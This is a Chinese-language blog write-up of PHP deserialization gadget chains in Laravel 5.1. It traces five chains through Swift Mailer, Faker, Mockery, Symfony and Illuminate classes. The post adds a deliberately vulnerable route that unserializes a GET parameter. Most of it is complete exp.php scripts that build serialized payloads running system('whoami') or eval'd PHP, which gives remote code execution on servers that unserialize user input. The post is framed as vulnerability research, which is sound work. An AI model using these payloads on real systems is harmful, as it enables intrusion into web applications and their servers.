laravel5.1反序列化

本文分析laravel5.1的反序列化链子

0x00 环境搭建

  1. composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"
  2. #下载的版本应该是 5.4.30的。

添加路由(routes/web.php)

  1. Route::get('/index', function () {
  2.     $payload=$_GET['cmd'];
  3.     echo $payload;
  4.     echo '<br>';
  5.     unserialize(($payload));
  6.     return 'hello binbin';
  7. });

0x01 链子1

通过全局搜索function __destruct(

发现

  1. //lib/classes/Swift/Transport/AbstractSmtpTransport.php
  2. public function __destruct()
  3. {
  4.     try {
  5.         $this->stop();
  6.     } catch (Exception $e) {
  7.     }
  8. }

跟进stop()

  1. //lib/classes/Swift/Transport/AbstractSmtpTransport.php
  2. public function stop()
  3. {
  4.     if ($this->_started) {
  5.         if ($evt = $this->_eventDispatcher->createTransportChangeEvent($this)) {//__call
  6.             $this->_eventDispatcher->dispatchEvent($evt, 'beforeTransportStopped');
  7.             if ($evt->bubbleCancelled()) {
  8.                 return;
  9.             }
  10.         }
  12.         try {
  13.             $this->executeCommand("QUIT\r\n", array(221));
  14.         } catch (Swift_TransportException $e) {
  15.         }
  17.         try {
  18.             $this->_buffer->terminate();//__call
  20.             if ($evt) {
  21.                 $this->_eventDispatcher->dispatchEvent($evt, 'transportStopped');
  22.             }
  23.         } catch (Swift_TransportException $e) {
  24.             $this->_throwException($e);
  25.         }
  26.     }
  27.     $this->_started = false;
  28. }

寻找__call方法

  1. //src/Faker/ValidGenerator.php
  2. public function __call($name, $arguments)
  3. {
  4.     $i = 0;
  5.     do {
  6.         $res = call_user_func_array(array($this->generator, $name), $arguments);
  7.         $i++;
  8.         if ($i > $this->maxRetries) {
  9.             throw new \OverflowException(sprintf('Maximum retries of %d reached without finding a valid value', $this->maxRetries));
  10.         }
  11.     } while (!call_user_func($this->validator, $res));
  13.     return $res;
  14. }

上面的方法中,!call_user_func($this->validator, $res)可用,只需要控制$res即可RCE

array($this->generator, $name)表示某个类的某个方法,于是寻找一个返回值可控的函数或者__call方法

  1. //src/Faker/DefaultGenerator.php
  2. //laravel中经典的方法
  3. public function __call($method, $attributes)
  4. {
  5.     return $this->default;
  6. }

于是就可以进行RCE

注意:由于Swift_Transport_AbstractSmtpTransport是一个抽象类,所以要使用它的子类进行序列化Swift_Transport_EsmtpTransport

exp.php

  1. <?php
  2. namespace Faker {
  4.     class ValidGenerator
  5.     {
  6.         protected $generator;
  7.         protected $validator;
  8.         protected $maxRetries;
  10.         public function __construct($generator, $validator ,$maxRetries)
  11.         {
  12.             $this->generator = $generator;
  13.             $this->validator = $validator;
  14.             $this->maxRetries = $maxRetries;
  15.         }
  16.     }
  17. }
  19. namespace Faker {
  20.     class DefaultGenerator
  21.     {
  22.         protected $default;
  24.         public function __construct($default)
  25.         {
  26.             $this->default = $default;
  27.         }
  28.     }
  29. }
  31. namespace {
  33.     use Faker\DefaultGenerator;
  34.     use Faker\ValidGenerator;
  36.     class Swift_Transport_EsmtpTransport
  37.     {
  38.         protected $_started = true;
  39.         protected $_eventDispatcher;
  41.         public function __construct($_started, $_eventDispatcher)
  42.         {
  43.             $this->_started = $_started;
  44.             $this->_eventDispatcher = $_eventDispatcher;
  45.         }
  46.     }
  48.     $defaultGenerator = new DefaultGenerator("whoami");
  49.     $validGenerator = new ValidGenerator($defaultGenerator,"system",9);
  50.     $swift_Transport_EsmtpTransport = new Swift_Transport_EsmtpTransport(true, $validGenerator);
  51.     echo urlencode((serialize($swift_Transport_EsmtpTransport)));
  52. }

0x02 链子2

寻找__destruct方法

  1. //lib/classes/Swift/KeyCache/DiskKeyCache.php
  2. public function __destruct()
  3. {
  4.     foreach ($this->_keys as $nsKey => $null) {
  5.         $this->clearAll($nsKey);
  6.     }
  7. }

跟进clearAll方法

  1. //lib/classes/Swift/KeyCache/DiskKeyCache.php
  2. public function clearAll($nsKey)
  3. {
  4.     if (array_key_exists($nsKey, $this->_keys)) {
  5.         foreach ($this->_keys[$nsKey] as $itemKey => $null) {
  6.             $this->clearKey($nsKey, $itemKey);
  7.         }
  8.         if (is_dir($this->_path.'/'.$nsKey)) {
  9.             rmdir($this->_path.'/'.$nsKey);
  10.         }
  11.         unset($this->_keys[$nsKey]);
  12.     }
  13. }

跟进clearKey方法

  1. //lib/classes/Swift/KeyCache/DiskKeyCache.php
  2. public function clearKey($nsKey, $itemKey)
  3. {
  4.     if ($this->hasKey($nsKey, $itemKey)) {
  5.         $this->_freeHandle($nsKey, $itemKey);
  6.         unlink($this->_path.'/'.$nsKey.'/'.$itemKey);
  7.     }
  8. }

跟进hasKey方法

  1. public function hasKey($nsKey, $itemKey)
  2. {
  3.     return is_file($this->_path.'/'.$nsKey.'/'.$itemKey);
  4.     //function is_file (string $filename): bool
  5. }

is_file方法会将$this->_path转换成字符串,会调用$this->_path__tostring

搜索__tostring

  1. //library/Mockery/Generator/DefinedTargetClass.php
  2. public function __toString()
  3. {
  4.     return $this->getName();
  5. }
  7. public function getName()
  8. {
  9.     return $this->rfc->getName();
  10. }

于是就可以调用__call方法,就可以使用链子1的后面的链子

寻找__call方法

  1. //src/Faker/ValidGenerator.php
  2. public function __call($name, $arguments)
  3. {
  4.     $i = 0;
  5.     do {
  6.         $res = call_user_func_array(array($this->generator, $name), $arguments);
  7.         $i++;
  8.         if ($i > $this->maxRetries) {
  9.             throw new \OverflowException(sprintf('Maximum retries of %d reached without finding a valid value', $this->maxRetries));
  10.         }
  11.     } while (!call_user_func($this->validator, $res));
  13.     return $res;
  14. }

上面的方法中,!call_user_func($this->validator, $res)可用,只需要控制$res即可RCE

array($this->generator, $name)表示某个类的某个方法,于是寻找一个返回值可控的函数或者__call方法

  1. //src/Faker/DefaultGenerator.php
  2. //laravel中经典的方法
  3. public function __call($method, $attributes)
  4. {
  5.     return $this->default;
  6. }

exp.php

  1. <?php
  3. namespace Faker {
  5.     class ValidGenerator
  6.     {
  7.         protected $generator;
  8.         protected $validator;
  9.         protected $maxRetries;
  11.         public function __construct($generator, $validator ,$maxRetries)
  12.         {
  13.             $this->generator = $generator;
  14.             $this->validator = $validator;
  15.             $this->maxRetries = $maxRetries;
  16.         }
  17.     }
  19.     class DefaultGenerator
  20.     {
  21.         protected $default;
  23.         public function __construct($default)
  24.         {
  25.             $this->default = $default;
  26.         }
  27.     }
  28. }
  30. namespace Mockery\Generator {
  32.     class DefinedTargetClass
  33.     {
  34.         private $rfc;
  36.         public function __construct($rfc)
  37.         {
  38.             $this->rfc = $rfc;
  39.         }
  41.     }
  42. }
  44. namespace {
  46.     use Faker\DefaultGenerator;
  47.     use Faker\ValidGenerator;
  48.     use Mockery\Generator\DefinedTargetClass;
  50.     class Swift_KeyCache_DiskKeyCache
  51.     {
  52.         private $_keys;
  53.         private $_path;
  55.         public function __construct($_keys, $_path)
  56.         {
  57.             $this->_keys = $_keys;
  58.             $this->_path = $_path;
  59.         }
  61.     }
  62.     $defaultGenerator = new DefaultGenerator("whoami");
  63.     $validGenerator = new ValidGenerator($defaultGenerator,"system",3);
  64.     $definedTargetClass = new DefinedTargetClass($validGenerator);
  65.     $swift_KeyCache_DiskKeyCache = new Swift_KeyCache_DiskKeyCache(array("binbin"=>array("binbin","binbin")),$definedTargetClass);
  66.     echo urlencode(serialize($swift_KeyCache_DiskKeyCache));
  68. }

0x03 链子3

寻找__destruct方法

  1. //Pipes/WindowsPipes.php
  2. public function __destruct()
  3. {
  4.     $this->close();
  5.     $this->removeFiles();
  6. }
  8. private function removeFiles()
  9. {
  10.     foreach ($this->files as $filename) {
  11.         //function file_exists (string $filename): bool
  12.         if (file_exists($filename)) {
  13.             @unlink($filename);
  14.         }
  15.     }
  16.     $this->files = array();
  17. }

可以调用$filename__toString

下面使用链子2的后面的路径

搜索__tostring

  1. //library/Mockery/Generator/DefinedTargetClass.php
  2. public function __toString()
  3. {
  4.     return $this->getName();
  5. }
  7. public function getName()
  8. {
  9.     return $this->rfc->getName();
  10. }

于是就可以调用__call方法,就可以使用链子1的后面的链子

寻找__call方法

  1. //src/Faker/ValidGenerator.php
  2. public function __call($name, $arguments)
  3. {
  4.     $i = 0;
  5.     do {
  6.         $res = call_user_func_array(array($this->generator, $name), $arguments);
  7.         $i++;
  8.         if ($i > $this->maxRetries) {
  9.             throw new \OverflowException(sprintf('Maximum retries of %d reached without finding a valid value', $this->maxRetries));
  10.         }
  11.     } while (!call_user_func($this->validator, $res));
  13.     return $res;
  14. }

上面的方法中,!call_user_func($this->validator, $res)可用,只需要控制$res即可RCE

array($this->generator, $name)表示某个类的某个方法,于是寻找一个返回值可控的函数或者__call方法

  1. //src/Faker/DefaultGenerator.php
  2. //laravel中经典的方法
  3. public function __call($method, $attributes)
  4. {
  5.     return $this->default;
  6. }

exp.php

  1. <?php
  3. namespace Faker {
  5.     class ValidGenerator
  6.     {
  7.         protected $generator;
  8.         protected $validator;
  9.         protected $maxRetries;
  11.         public function __construct($generator, $validator ,$maxRetries)
  12.         {
  13.             $this->generator = $generator;
  14.             $this->validator = $validator;
  15.             $this->maxRetries = $maxRetries;
  16.         }
  17.     }
  19.     class DefaultGenerator
  20.     {
  21.         protected $default;
  23.         public function __construct($default)
  24.         {
  25.             $this->default = $default;
  26.         }
  27.     }
  28. }
  30. namespace Mockery\Generator {
  32.     class DefinedTargetClass
  33.     {
  34.         private $rfc;
  36.         public function __construct($rfc)
  37.         {
  38.             $this->rfc = $rfc;
  39.         }
  41.     }
  42. }
  44. /*
  45.  * This file is part of the Symfony package.
  46.  *
  47.  * (c) Fabien Potencier 
  48.  *
  49.  * For the full copyright and license information, please view the LICENSE
  50.  * file that was distributed with this source code.
  51.  */
  53. namespace Symfony\Component\Process\Pipes {
  54.     class WindowsPipes
  55.     {
  56.         private $files;
  58.         public function __construct($files)
  59.         {
  60.             $this->files = $files;
  61.         }
  63.     }
  64. }
  66. namespace {
  67.     use Faker\DefaultGenerator;
  68.     use Faker\ValidGenerator;
  69.     use Mockery\Generator\DefinedTargetClass;
  70.     use Symfony\Component\Process\Pipes\WindowsPipes;
  72.     $defaultGenerator = new DefaultGenerator("whoami");
  73.     $validGenerator = new ValidGenerator($defaultGenerator,"system",3);
  74.     $definedTargetClass = new DefinedTargetClass($validGenerator);
  75.     $windowsPipes = new WindowsPipes(array($definedTargetClass));
  76.     echo urlencode(serialize($windowsPipes));
  78. }

入口找得差不多了下面继续寻找可以利用的__call

由于链子1入口比较简单,所以以链子1作为入口,寻找可以利用的__call

0x04 链子4

通过全局搜索function __destruct(

发现

  1. //lib/classes/Swift/Transport/AbstractSmtpTransport.php
  2. public function __destruct()
  3. {
  4.     try {
  5.         $this->stop();
  6.     } catch (Exception $e) {
  7.     }
  8. }

跟进stop()

  1. //lib/classes/Swift/Transport/AbstractSmtpTransport.php
  2. public function stop()
  3. {
  4.     if ($this->_started) {
  5.         if ($evt = $this->_eventDispatcher->createTransportChangeEvent($this)) {//__call
  6.             $this->_eventDispatcher->dispatchEvent($evt, 'beforeTransportStopped');
  7.             if ($evt->bubbleCancelled()) {
  8.                 return;
  9.             }
  10.         }
  12.         try {
  13.             $this->executeCommand("QUIT\r\n", array(221));
  14.         } catch (Swift_TransportException $e) {
  15.         }
  17.         try {
  18.             $this->_buffer->terminate();//__call
  20.             if ($evt) {
  21.                 $this->_eventDispatcher->dispatchEvent($evt, 'transportStopped');
  22.             }
  23.         } catch (Swift_TransportException $e) {
  24.             $this->_throwException($e);
  25.         }
  26.     }
  27.     $this->_started = false;
  28. }

寻找__call方法

  1. //src/Illuminate/Database/DatabaseManager.php
  2. public function __call($method, $parameters)
  3. {
  4.     return call_user_func_array([$this->connection(), $method], $parameters);
  5. }
  7. public function connection($name = null)
  8. {
  9.     list($name, $type) = $this->parseConnectionName($name);
  10.     //返回 [$this->app['config']['database.default'], null]
  11.     //$name=$this->app['config']['database.default']
  13.     if (! isset($this->connections[$name])) {
  14.         $connection = $this->makeConnection($name);
  16.         $this->setPdoForType($connection, $type);
  18.         $this->connections[$name] = $this->prepare($connection);
  19.     }
  21.     return $this->connections[$name];
  22. }
  24. protected function parseConnectionName($name)//$name=null
  25. {
  26.     $name = $name ?: $this->getDefaultConnection();
  28.     return Str::endsWith($name, ['::read', '::write'])
  29.         ? explode('::', $name, 2) : [$name, null];
  30. }
  32. public function getDefaultConnection()
  33. {
  34.     return $this->app['config']['database.default'];
  35. }
  37. protected function makeConnection($name)//$name=$this->app['config']['database.default']
  38. {
  39.     $config = $this->getConfig($name);
  40.     //返回$this->app['config']['database.connections'];
  41.     if (isset($this->extensions[$name])) {
  42.         return call_user_func($this->extensions[$name], $config, $name);
  43.     }
  45.     $driver = $config['driver'];
  47.     if (isset($this->extensions[$driver])) {
  48.         return call_user_func($this->extensions[$driver], $config, $name);
  49.         //RCE
  50.     }
  52.     return $this->factory->make($config, $name);
  53. }
  55. protected function getConfig($name) //$name=$this->app['config']['database.default']
  56. {
  57.     $name = $name ?: $this->getDefaultConnection();//$name存在,不改变
  59.     $connections = $this->app['config']['database.connections'];
  61.     if (is_null($config = Arr::get($connections, $name))) {
  62.         //$config=$this->app['config']['database.connections'];
  63.         throw new InvalidArgumentException("Database [$name] not configured.");
  64.     }
  66.     return $config;
  67. }
  69. //src/Illuminate/Support/Arr.php
  70. public static function get($array, $key, $default = null)
  71. {
  72.     if (is_null($key)) {
  73.         return $array;
  74.     }
  76.     if (isset($array[$key])) {
  77.         return $array[$key];
  78.     }
  80.     foreach (explode('.', $key) as $segment) {
  81.         if (! is_array($array) || ! array_key_exists($segment, $array)) {
  82.             return value($default);
  83.         }
  85.         $array = $array[$segment];
  86.     }
  88.     return $array;
  89. }

对于call_user_func($this->extensions[$name], $config, $name);有两个参数的利用

本来想着system()可以接受两个参数,正常执行

  1. call_user_func("system","calc","binbin");
  2. //可以正常弹计算器

image-20221007161016275.png

exp.php(不能用)

  1. <?php
  2. namespace Illuminate\Database {
  4.     class DatabaseManager
  5.     {
  6.         protected $app;
  7.         protected $extensions;
  9.         public function __construct()
  10.         {
  11.             $this->app['config']['database.default']="binbin";
  12.             $this->app['config']['database.connections']=array("binbin"=>"whoami");
  13.             $this->extensions = array("binbin" =>"system");
  14.         }
  16.     }
  17. }
  19. namespace {
  20.     use Illuminate\Database\DatabaseManager;
  22.     class Swift_Transport_EsmtpTransport
  23.     {
  24.         protected $_started = true;
  25.         protected $_eventDispatcher;
  27.         public function __construct($_started, $_eventDispatcher)
  28.         {
  29.             $this->_started = $_started;
  30.             $this->_eventDispatcher = $_eventDispatcher;
  31.         }
  32.     }
  34.     $databaseManager = new DatabaseManager();
  35.     $swift_Transport_EsmtpTransport = new Swift_Transport_EsmtpTransport(true, $databaseManager);
  36.     echo urlencode((serialize($swift_Transport_EsmtpTransport)));
  37. }

但是不知道为什么反序列化时不可以使用

只能使用

  1. call_user_func("call_user_func","system","calc");

exp.php

  1. <?php
  3. namespace Illuminate\Database {
  5.     class DatabaseManager
  6.     {
  7.         protected $app;
  8.         protected $extensions;
  10.         public function __construct()
  11.         {
  12.             $this->app['config']['database.default']="whoami";
  13.             $this->app['config']['database.connections']=array("whoami"=>"system");
  14.             $this->extensions = array("whoami" =>"call_user_func");
  15.         }
  17.     }
  18. }
  20. namespace {
  22.     use Illuminate\Database\DatabaseManager;
  24.     class Swift_Transport_EsmtpTransport
  25.     {
  26.         protected $_started = true;
  27.         protected $_eventDispatcher;
  29.         public function __construct($_started, $_eventDispatcher)
  30.         {
  31.             $this->_started = $_started;
  32.             $this->_eventDispatcher = $_eventDispatcher;
  33.         }
  34.     }
  36.     $databaseManager = new DatabaseManager();
  37.     $swift_Transport_EsmtpTransport = new Swift_Transport_EsmtpTransport(true, $databaseManager);
  38.     echo urlencode((serialize($swift_Transport_EsmtpTransport)));
  39. }

0x05 链子5

寻找__destruct方法

  1. //Pipes/WindowsPipes.php
  2. public function __destruct()
  3. {
  4.     $this->close();
  5.     $this->removeFiles();
  6. }
  8. private function removeFiles()
  9. {
  10.     foreach ($this->files as $filename) {
  11.         //function file_exists (string $filename): bool
  12.         if (file_exists($filename)) {
  13.             @unlink($filename);
  14.         }
  15.     }
  16.     $this->files = array();
  17. }

可以调用$filename__toString

下面使用链子2的后面的路径

搜索__tostring

  1. //src/Prophecy/Argument/Token/ObjectStateToken.php
  2. public function __toString()
  3. {
  4.     return sprintf('state(%s(), %s)',
  5.                    $this->name,
  6.                    $this->util->stringify($this->value)
  7.                   );
  8. }

寻找__call方法

  1. //src/Illuminate/Validation/Validator.php
  2. public function __call($method, $parameters)//$method=createTransportChangeEvent
  3. {
  4.     $rule = Str::snake(substr($method, 8));
  5.     //$rule= ansportChangeEvent
  6.     if (isset($this->extensions[$rule])) {
  7.         return $this->callExtension($rule, $parameters);
  8.     }
  9.     throw new BadMethodCallException("Method [$method] does not exist.");
  10. }
  12. protected function callExtension($rule, $parameters)
  13. {
  14.     $callback = $this->extensions[$rule];//$rule= ansportChangeEvent
  16.     if ($callback instanceof Closure) {
  17.         return call_user_func_array($callback, $parameters);
  18.     } elseif (is_string($callback)) {
  19.         return $this->callClassBasedExtension($callback, $parameters);
  20.     }
  21. }
  23. protected function callClassBasedExtension($callback, $parameters)
  24. {
  25.     list($class, $method) = explode('@', $callback);
  26.     return call_user_func_array([$this->container->make($class), $method], $parameters);
  27. }

此处可以控制$extensions从而控制$callback然后就可以控制$class$method,如果可以控制$this->container->make($class)就可以调用任何类的任何方法

控制$this->container->make($class)

可以使用经典的DefaultGenerator类中的__call返回任意的对象

  1. //src/Faker/DefaultGenerator.php
  2. public function __call($method, $attributes)
  3. {
  4.     return $this->default;
  5. }

下面寻找一些危险的函数 如evalsystemcall_user_funcshell_execfile_put_contents等 ,尝试进行调用

  1. class EvalLoader implements Loader
  2. {
  3.     public function load(MockDefinition $definition)
  4.     {
  5.         if (class_exists($definition->getClassName(), false)) {
  6.             return;
  7.         }
  9.         eval("?>" . $definition->getCode());
  10.     }
  11. }

跟进getCode

  1. //library/Mockery/Generator/MockDefinition.php
  2. public function getClassName()
  3. {
  4.     return $this->config->getName();
  5. }
  7. public function getCode()
  8. {
  9.     return $this->code;
  10. }

可以使用经典的DefaultGenerator类中的__call返回任意的对象

  1. //src/Faker/DefaultGenerator.php
  2. public function __call($method, $attributes)
  3. {
  4.     return $this->default;
  5. }

exp.php

  1. <?php
  3. namespace Prophecy\Argument\Token {
  4.     class ObjectStateToken
  5.     {
  6.         private $value;
  7.         private $util;
  9.         public function __construct($value, $util)
  10.         {
  11.             $this->value = $value;
  12.             $this->util = $util;
  13.         }
  15.     }
  16. }
  18. namespace Faker {
  19.     class DefaultGenerator
  20.     {
  21.         protected $default;
  23.         public function __construct($default)
  24.         {
  25.             $this->default = $default;
  26.         }
  27.     }
  28. }
  30. namespace Symfony\Component\Process\Pipes {
  31.     class WindowsPipes
  32.     {
  33.         private $files;
  35.         public function __construct($files)
  36.         {
  37.             $this->files = $files;
  38.         }
  40.     }
  41. }
  43. namespace Mockery\Loader {
  45.     class EvalLoader
  46.     {
  47.     }
  48. }
  50. namespace Illuminate\Validation {
  52.     class Validator
  53.     {
  54.         protected $extensions;
  55.         protected $container;
  57.         public function __construct($extensions,$container)
  58.         {
  59.             $this->extensions = $extensions;
  60.             $this->container = $container;
  62.         }
  64.     }
  65. }
  66. namespace Mockery\Generator {
  68.     use Faker\DefaultGenerator;
  69.     use Mockery\Loader\EvalLoader;
  71.     class MockDefinition
  72.     {
  73.         protected $config;
  74.         protected $code;
  75.         public function __construct($config)
  76.         {
  77.             $this->config=$config;
  78.             $this->code = ' <?php var_dump(system("whoami"));';
  79.         }
  80.     }
  81. }
  82. namespace {
  84.     use Faker\DefaultGenerator;
  85.     use Illuminate\Validation\Validator;
  86.     use Mockery\Generator\MockDefinition;
  87.     use Mockery\Loader\EvalLoader;
  88.     use Prophecy\Argument\Token\ObjectStateToken;
  89.     use Symfony\Component\Process\Pipes\WindowsPipes;
  91.     $evalLoader = new EvalLoader();
  92.     $defaultGenerator1 = new DefaultGenerator("binbin");
  93.     $mockDefinition = new MockDefinition($defaultGenerator1);
  94.     $defaultGenerator = new DefaultGenerator($evalLoader);
  95.     $validator = new Validator(array("y"=>"binbin@load"),$defaultGenerator);
  96.     $objectStateToken = new ObjectStateToken($mockDefinition,$validator);
  97.     $windowsPipes = new WindowsPipes(array($objectStateToken));
  98.     echo urlencode((serialize($windowsPipes)));
  99. }

0x06 提问:

链子4中

对于call_user_func($this->extensions[$name], $config, $name);有两个参数的利用

本来想着system()可以接受两个参数,正常执行

  1. call_user_func("system","calc","binbin");
  2. //可以正常弹计算器

image-20221007161016275.png

exp.php(不能用)

  1. <?php
  2. namespace Illuminate\Database {
  4.     class DatabaseManager
  5.     {
  6.         protected $app;
  7.         protected $extensions;
  9.         public function __construct()
  10.         {
  11.             $this->app['config']['database.default']="binbin";
  12.             $this->app['config']['database.connections']=array("binbin"=>"whoami");
  13.             $this->extensions = array("binbin" =>"system");
  14.         }
  16.     }
  17. }
  19. namespace {
  20.     use Illuminate\Database\DatabaseManager;
  22.     class Swift_Transport_EsmtpTransport
  23.     {
  24.         protected $_started = true;
  25.         protected $_eventDispatcher;
  27.         public function __construct($_started, $_eventDispatcher)
  28.         {
  29.             $this->_started = $_started;
  30.             $this->_eventDispatcher = $_eventDispatcher;
  31.         }
  32.     }
  34.     $databaseManager = new DatabaseManager();
  35.     $swift_Transport_EsmtpTransport = new Swift_Transport_EsmtpTransport(true, $databaseManager);
  36.     echo urlencode((serialize($swift_Transport_EsmtpTransport)));
  37. }

为什么反序列化时不可以使用?希望有师傅评论区解答一下

  • 发表于 2022-10-17 10:05:33
  • 阅读 ( 6917 )
  • 分类:漏洞分析

0 条评论

binbin
binbin

4 篇文章

binbin

如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!

站长统计